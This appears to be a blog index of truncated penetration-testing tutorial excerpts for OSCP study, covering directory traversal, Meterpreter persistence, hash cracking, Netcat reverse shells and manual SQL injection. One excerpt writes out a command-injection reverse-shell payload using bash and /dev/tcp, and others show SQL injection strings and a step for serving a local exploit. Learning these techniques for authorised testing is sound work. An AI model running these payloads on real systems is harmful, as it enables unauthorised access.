So you have researched your web app and found that it may be vulnerable to directory traversal attacks. Very often the path to the initial point of the directory traversal is given in the exploit guide. If it isn’t, however, you can potentially use the dotdotpwn script to find a potential […]
Once you get a Meterpreter shell it is important to try to hide the process in an attempt to gain persistence. First of all, make a note of the session number and then background the Meterpreter session by issuing the background command: background. Then migrate the Meterpreter process to another session. Do this by using the following […]
The following is specific to Kali Linux. After recovering hashes from the target, create a text file with the hashes separated by new lines. Save it in the current working directory as something like hash.txt. Make sure you have unzipped the rockyou.txt password list, as this is the password file we will be using […]
Once you have a reverse connection using a Netcat listener, you can use the following technique to copy files onto the target machine, e.g.: cp /usr/share/exploitdb/platforms/linux/local/9545.c /var/www/html This will copy an exploit into Kali’s web root directory. Run the following to ensure your Apache web service is running: service apache2 start service apache2 status Move back […]
Set up a listener on Kali using Netcat: nc -nlvp 4444 Use the following to connect back to the listener from the target: ; bash -i>&/dev/tcp/LOCALIP/4444 0>&1 Use the following to find out your user and privileges: whoami id To create a more interactive shell from the Netcat shell, try: python -c ‘import […]
So you suspect a page might be vulnerable to SQL injection, but before you run it through SQLmap you can try the following statements to manually test the input. The intention is for this post to grow over time and become a repository of all the successful manual injection points I use. ‘ admin’ or […]
So you’ve been doing some research into preparing for the OSCP Penetration Testing with Kali course and certification. You have discovered that, in order to stand a good chance of doing well in the exam, it pays to become proficient in enumeration. Enumeration is the process by which the pen tester discovers as much as […]
How to write a basic Bash script, with an example of a ping sweep that returns live hosts.
Understanding Linux file permissions and how to change them using chmod.
Very basic Linux Terminal commands for the beginner pen tester.